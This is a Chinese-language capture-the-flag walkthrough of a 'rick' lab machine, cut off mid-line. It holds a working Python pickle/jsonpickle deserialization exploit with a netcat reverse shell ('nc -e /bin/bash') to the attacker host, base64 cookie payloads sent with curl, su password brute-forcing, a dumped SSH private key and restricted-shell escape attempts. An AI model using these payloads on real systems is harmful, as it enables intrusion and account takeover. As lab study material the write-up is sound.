![\"image-20240712183424922\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722172.png\")
<\/div>\n
![\"image-20240716145039964\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722174.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ rustscan -a $IP -- -A \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\nOpen 172.20.10.3:5000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc6WD+nd5ZbnlOmJHKiExjfgbFX6q+QAKK3N+lsm6vntaQ3CRgdDBf37SsO5ptEHMUZrDPGBch03b0An18k6pHwSLfz5AuCTN3W0Rtqd2iFRqkhgoVatSEoESxCwULEpsRB738QhCeAfiTgHr\/s5WtdQAgEoSBS6e4k8KHRD1M+8FVHrolrvJA\/\/cQ7VzVvCDbQ\/eYWh3kUjRJj\/cFzY\/Jpgwu0QxNhzXmHwroAjtzd0D59f\/KIxG0ULyAr9aQoQVjy7fMN7wJyZZxhLLKSSMoT7G51khfn9Bwun9peI32IwZnVJ3L87fGgsSy\/KdOjJDRLsGCXJNtT+jUviHAaTWz\n| 256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIh5KJU7muB4UyLIXStFY9R+LekTaOgLGzYh\/sWHOO+aj7OOE8QDWgjPTSZt0uDG9+bmT3Uz8v3EY2b0QDP5X9I=\n| 256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGBDJ\/OjwxXNZ01JjiQXyOVhcY3z9ADXsEWJEOUMdHpd\n80\/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))\n|_http-title: Apache2 Test Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n5000\/tcp open http syn-ack Werkzeug httpd 0.15.5 (Python 2.7.16)\n| http-title: 500 Internal Server Error\n|_Requested resource was http:\/\/172.20.10.3:5000\/whoami\n| http-methods: \n|_ Supported Methods: HEAD OPTIONS GET\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u8fdb\u884c\u5e38\u89c4\u7684\u626b\u4e00\u4e0b\u5f97\u4e86\uff0c\u5e73\u5e38\u7528\u4e0a\u7684\u4e5f\u4e0d\u591a\uff0c\u5230\u65f6\u5019\u518d\u626b<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/.php (Status: 403) [Size: 276]\n\/index.html (Status: 200) [Size: 10706]\n\/.html (Status: 403) [Size: 276]\n\/manual (Status: 301) [Size: 311] [--> http:\/\/172.20.10.3\/manual\/]\n\/javascript (Status: 301) [Size: 315] [--> http:\/\/172.20.10.3\/javascript\/]\n\/robots.txt (Status: 403) [Size: 276]<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
\u8e29\u70b9\uff0c\u53d1\u73b0\u9ed8\u8ba4\u7684\u662f\u9ed8\u8ba4\u5f97apache\u9ed8\u8ba4\u754c\u9762\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/172.20.10.3 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[172.20.10.3], Title[Apache2 Test Debian Default Page: It works]<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n
\u6ca1\u53d1\u73b0\u6709\u5565\u6709\u7528\u7684\uff0c\u57fa\u672c\u4e0a\u76ee\u5f55\u6743\u9650\u90fd\u6ca1\u6709\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
\u770b\u4e00\u4e0b 5000 \u7aef\u53e3\uff0c\u4e00\u8fb9\u626b\u4e00\u4e0b\uff0c\u4e00\u904d\u624b\u52a8\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/code><\/pre>\n![\"image-20240716145813718\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u70b9\u51fbMain page<\/code>\u56de\u5230\uff1a<\/p>\n<\/div><\/p>\n\u67e5\u770b\u6e90\u7801\uff0c\u672a\u53d1\u73b0\u5947\u602a\u7684\u5185\u5bb9\u4e0e\u63d0\u793a\uff0c\u4e14\u5c1d\u8bd5\u6267\u884c\u547d\u4ee4\u53d1\u73b0\u5931\u8d25\uff1a<\/p>\n
http:\/\/172.20.10.3:5000\/id\n# Not Found\n# The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.<\/code><\/pre>\n\u5c1d\u8bd5F12<\/code>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u53d1\u73b0\u672a\u77e5base64<\/code>\u52a0\u5bc6\u540e\u7684cookie\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ echo 'eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0=' | base64 -d | jq\n{\n "py\/object": "__main__.User",\n "username": "Rick"\n}<\/code><\/pre>\n\u5f88\u660e\u663e\u662f\u4e00\u4e2apython\u7684\u5e8f\u5217\u5316\uff0c\u5c1d\u8bd5\u641c\u7d22\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff1a<\/p>\n
https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Insecure%20Deserialization\/Python\/#pickle<\/a><\/p>\nimport cPickle, os\nfrom base64 import b64encode, b64decode\n\nclass Evil(object):\n def __reduce__(self):\n return (os.system,("nc -e \/bin\/bash 172.20.10.8 1234",))\n\ne = Evil()\nevil_token = b64encode(cPickle.dumps(e))\nprint("Your Evil Token : {}").format(evil_token)<\/code><\/pre>\n\u5c1d\u8bd5\u6784\u9020\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ python2 exp.py\nYour Evil Token : Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ curl -b "Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to target URL: <a href="\/whoami">\/whoami<\/a>. If not click the link.\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ echo 'Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou' | base64 -d\ncposix\nsystem\np1\n(S'nc -e \/bin\/bash 172.20.10.8 1234'\np2\ntp3\nRp4\n. <\/code><\/pre>\n\u53d1\u73b0\u4e0d\u592a\u5f97\u52b2\uff0c\u6362\u4e00\u4e2a\uff1ahttps:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator<\/a><\/p>\n<\/div><\/p>\n# git clone https:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator.git\n# cd python-deserialization-attack-payload-generator\n# ls -la\n# pip3 install -r requirements.txt\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ python3 peas.py \nEnter RCE command :nc -e \/bin\/bash 172.20.10.8 1234\nEnter operating system of target [linux\/windows] . Default is linux :\nWant to base64 encode payload ? [N\/y] :y\nEnter File location and name to save :.\/payload\nSelect Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :jsonpickle\nDone Saving file !!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ cat payload_jspick \neyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0= \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ echo 'eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=' | base64 -d \n{"py\/reduce": [{"py\/type": "subprocess.Popen"}, {"py\/tuple": [{"py\/tuple": ["nc", "-e", "\/bin\/bash", "172.20.10.8", "1234"]}]}]}<\/code><\/pre>\n\u770b\u8d77\u6765\u5f88\u5b8c\u7f8e\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b "eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to target URL: <a href="\/whoami">\/whoami<\/a>. If not click the link.<\/code><\/pre>\n\u53d1\u73b0\u5fd8\u4e86\u52a0\u5934\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b "username=Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>500 Internal Server Error<\/title>\n<h1>Internal Server Error<\/h1>\n<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.<\/p>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b "username=eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=" http:\/\/$IP:5000\n<!DOCTYPE HTML PUBLIC "-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN">\n<title>500 Internal Server Error<\/title>\n<h1>Internal Server Error<\/h1>\n<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.<\/p><\/code><\/pre>\n\u7b2c\u4e8c\u4e2a\u8fd0\u884c\u4ee5\u540e\u53d1\u73b0\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@rick:\/var\/www\/html$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) www-data@rick:\/var\/www\/html$ cat \/etc\/passwd | grep 'sh'\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nrick:x:1000:1000:,,,:\/home\/rick:\/bin\/bash\nmorty:x:1001:1001:,,,:\/home\/morty:\/bin\/rbash\n(remote) www-data@rick:\/var\/www\/html$ cd \/home\/morty\/\n(remote) www-data@rick:\/home\/morty$ ls -la\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Nov 24 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 morty morty 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24 2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24 2021 .gnupg\n-rw-r--r-- 1 rick rick 107 Nov 24 2021 .important\n-rw-r--r-- 1 morty morty 807 Nov 24 2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24 2021 .ssh\n-rw------- 1 morty morty 680 Nov 24 2021 .viminfo\n(remote) www-data@rick:\/home\/morty$ cat .important \n-***You are completely crazy Morty to keep a password that easy! Change it before you get hacked!***-\nRick<\/code><\/pre>\nsu\u7206\u7834\u7528\u6237morty<\/h3>\n
\u5c1d\u8bd5\u4e0a\u4f20\u5b57\u5178\u4ee5\u53ca\u7206\u7834\u811a\u672c\uff1ahttps:\/\/github.com\/carlospolop\/su-bruteforce<\/a><\/p>\n(remote) www-data@rick:\/tmp$ .\/suBF.sh -u morty\n [+] Bruteforcing morty...\n^C\n(remote) www-data@rick:\/tmp$ .\/suBF.sh -u morty -w top12000.txt \n [+] Bruteforcing morty...\n You can login as morty using password: internet\n^C<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u5207\u6362\u7528\u6237<\/p>\n
morty\ninternet<\/code><\/pre>\nperlbug \u63d0\u6743<\/h3>\n(remote) www-data@rick:\/tmp$ su morty\nPassword: \nmorty@rick:\/tmp$ cd ~\nrbash: cd: restricted\nmorty@rick:\/tmp$ whoami\nmorty\nmorty@rick:\/tmp$ echo $SHELL\n\/bin\/rbash\nmorty@rick:\/tmp$ ls -la \/home\/morty\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Nov 24 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 24 2021 ..\nlrwxrwxrwx 1 root root 9 Nov 24 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 morty morty 220 Nov 24 2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24 2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24 2021 .gnupg\n-rw-r--r-- 1 rick rick 107 Nov 24 2021 .important\n-rw-r--r-- 1 morty morty 807 Nov 24 2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24 2021 .ssh\n-rw------- 1 morty morty 680 Nov 24 2021 .viminfo\nmorty@rick:\/tmp$ cat .ssh\/id_rsa\ncat: .ssh\/id_rsa: No such file or directory\nmorty@rick:\/tmp$ ls -la \/home\/morty\/.ssh\ntotal 16\ndrwx------ 2 morty morty 4096 Nov 24 2021 .\ndrwxr-xr-x 4 morty morty 4096 Nov 24 2021 ..\n-rw-r--r-- 1 morty morty 397 Nov 24 2021 authorized_keys\n-rw------- 1 morty morty 1823 Nov 24 2021 id_rsa\nmorty@rick:\/tmp$ cat \/home\/morty\/.ssh\/id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAy7by5MzwimmC6fONkUMVjQU31ABHe1YfN2OHOGL3JCOwYZt6ya3s\n+LAfEfcpE8y7Ksyi\/tzoEAUfT+bIp4DS5C9KaBgoks4GHl30IcXQr4BKELsCPm5liQS0i9\noCBW\/ECkKrsuwOxRqQk1QAgxJ0xh1A2LKgjGkIH0SW8fuem3oSmL3ki4tZ9wdHREx2d6BB\n6cfTmOjUNlDk9\/UeHvLicRPgIvAI0Y\/Aod1aP56qSK+9nujZlWhGkeenRC3Eme2FpcPW6M\nte0Zh32+CetgrTAZZtn\/FB+vohvjPyv8U77XjqK2d71aZypBYo4qVIZVjmwYii6iwYrRrL\nmfSA00mOtQAAA8hQRDPRUEQz0QAAAAdzc2gtcnNhAAABAQDLtvLkzPCKaYLp842RQxWNBT\nfUAEd7Vh83Y4c4YvckI7Bhm3rJrez4sB8R9ykTzLsqzKL+3OgQBR9P5singNLkL0poGCiS\nzgYeXfQhxdCvgEoQuwI+bmWJBLSL2gIFb8QKQquy7A7FGpCTVACDEnTGHUDYsqCMaQgfRJ\nbx+56behKYveSLi1n3B0dETHZ3oEHpx9OY6NQ2UOT39R4e8uJxE+Ai8AjRj8Ch3Vo\/nqpI\nr72e6NmVaEaR56dELcSZ7YWlw9boy17RmHfb4J62CtMBlm2f8UH6+iG+M\/K\/xTvteOorZ3\nvVpnKkFijipUhlWObBiKLqLBitGsuZ9IDTSY61AAAAAwEAAQAAAQBsyMyafAozj7aWIjZG\nDRHUFaZDcsa5STswQ9jwtoCNbvWAmhuO2W8DOmHNITRxW1HTwCWGfgb6jxGyhGZAdJ2pts\ntAHS6Ffrlru\/ZjlpQjNBnZJ1RCbIeSDM4xJIER0CZa6FFyIXadsNrloeUIGXH8XaDEV1c+\nw9PPhrwoipqfITOvI11+oWyaM5zFr\/ScTeP3UCAWnXAVpEaJMRPUyzN1HWcbqlPds6iVEm\nwy+nUxWDn2tkHYkXvsxg\/4iK54f5mdgvobkMJe6YXlmmDTwIqxM26NCn+YcnuBSNZTpgSv\nerAfSu86toGvwpVj3QN7Sd7xoPKExsKQz6nn6LCNGot9AAAAgQDNHON6hrdcZCrc7+2fhu\n4ZyDX2\/lzggW5eGN4Q2zX2WyVIfpYwxH9M+bMpDSVYaFcw4u38BDo6gGgptdzYvOukvkOJ\nPXuH40SVJMpJGzCRr9x+O4y3A61u7SfOH+e+Qa4Z32GRt5X3iTIYDGhoTEwdDAe9mbIF60\nKeXF\/cF6XO\/gAAAIEA8xCxeR\/rXL1Rennm\/jObw\/Nvtv9NuA4TlMVTk5qiAikyp7iEXWOo\n4Psfr9HKJ8j3xt0jaIVvMxExva+XfvfduQybBidLhf8p3Z03NwNIcKNBydakMomjN1HKxY\nNV+DbeHL0X6+9Z8NuF4HVd0GjpOKe4EZ5VFLsyjs8JHoKOYLMAAACBANaOLZSvEa0DSR9b\n8XP97CGjp97fEl\/gyOjmha2sW4ZXdEj55j\/CyZ6FdT8BsF9ygTtBFBDI5\/pFkdKQNxj\/Aw\nTsGzDINUlZhk3iK4Mkk5\/DsUU1V4fW2vUiXAb\/WkLNd+frGHC\/ewUC0y077ClTnOCR8OX9\nhj+7nT1fqBN\/qbb3AAAAD21vcnR5QHN5bWZvbm9zNAECAw==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\u4e0a\u53bb\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8f6cshell\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ ssh morty@$IP -i morty -t bash \nThe authenticity of host '172.20.10.3 (172.20.10.3)' can't be established.\nED25519 key fingerprint is SHA256:ntMXt1jIeiDKNEuRMRXU6uCVo\/fmwaEqmxDA5r4nwds.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '172.20.10.3' (ED25519) to the list of known hosts.\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ sudo -l\nMatching Defaults entries for morty on rick:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser morty may run the following commands on rick:\n (rick) NOPASSWD: \/usr\/bin\/perlbug<\/code><\/pre>\n\u53d1\u73b0\u63d0\u6743\u65b9\u6848\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/perlbug\/<\/a><\/p>\n\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\n
morty@rick:~$ sudo -u rick \/usr\/bin\/perlbug -s 'x x x' -r x -c x -e 'exec \/bin\/bash;'\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: whoami\nwhoami is not a "core" Perl module. Please check that you\nentered its name correctly. If it is correct, quit this program,\ntry searching for whoami on http:\/\/rt.cpan.org, and report your\nissue there.\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it's not, just hit Enter\nto skip this question.\n\nModule: ^C\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ whoami;id\nmorty\nuid=1001(morty) gid=1001(morty) groups=1001(morty)\nmorty@rick:~$ sudo -u rick \/usr\/bin\/perlbug -s 'whoami' -r x -c x -e 'exec \/bin\/bash;'\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org. To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n'perlthanks'.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nThe subject you entered wasn't very descriptive. Please try again.\n\nFirst of all, please provide a subject for the message.\nThis should be a concise description of your bug or problem\nwhich will help the volunteers working to improve perl to\ncategorize and resolve the issue. Be as specific and\ndescriptive as you can. A subject like "perl bug" or "perl\nproblem" will make it much less likely that your issue gets the\nattention it deserves.\n\nSubject: whoami\n\nThe subject you entered wasn't very descriptive. Please try again.\n\nSubject: ^C\nmorty@rick:~$ whoami;id\nmorty\nuid=1001(morty) gid=1001(morty) groups=1001(morty)<\/code><\/pre>\n\u8fd8\u662f\u4e0d\u9614\u4ee5\uff0c\u5c1d\u8bd5\u5176\u4ed6\u529e\u6cd5\u5148\u83b7\u53d6bash<\/code>\uff0c\u770b\u5230\u76ee\u5f55\u5b58\u5728vim<\/code>\u7f16\u8f91\u7684\u75d5\u8ff9\uff0c\u5c1d\u8bd5\u4f7f\u7528vim<\/code>\u63d0\u53d6\u4e00\u4e0bshell\uff01<\/p>\nmorty@rick:~$ vim -c ':!\/bin\/bash'\n\n\/bin\/rbash: \/bin\/bash: restricted: cannot specify `\/' in command names\n\nshell returned 1\n\nPress ENTER or type command to continue\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash<\/code><\/pre>\n\u7ee7\u7eed\u67e5\u627e\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
morty@rick:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\nmorty@rick:~$ printenv\nSHELL=\/bin\/rbash\nPWD=\/home\/morty\nLOGNAME=morty\nXDG_SESSION_TYPE=tty\nHOME=\/home\/morty\nLANG=en_US.UTF-8\nLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:\nVIMRUNTIME=\/usr\/share\/vim\/vim81\nSSH_CONNECTION=172.20.10.8 38636 172.20.10.3 22\nVIM=\/usr\/share\/vim\nXDG_SESSION_CLASS=user\nTERM=xterm-256color\nUSER=morty\nSHLVL=2\nXDG_SESSION_ID=9\nXDG_RUNTIME_DIR=\/run\/user\/1001\nSSH_CLIENT=172.20.10.8 38636 22\nPATH=\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/games\nMAIL=\/var\/mail\/morty\nSSH_TTY=\/dev\/pts\/1\n_=\/usr\/bin\/printenv\nmorty@rick:~$ ls -la \/bin | grep bash\nmorty@rick:~$ ls -la \/usr\/local\/bin | grep bash\nmorty@rick:~$ ls -la \/usr\/bin | grep bash\n-rwxr-xr-x 1 root root 1302248 Apr 17 2019 bash\n-rwxr-xr-x 1 root root 6789 Apr 17 2019 bashbug\n-rwxr-xr-x 1 root root 2446 Feb 11 2019 dh_bash-completion\nlrwxrwxrwx 1 root root 4 Apr 17 2019 rbash -> 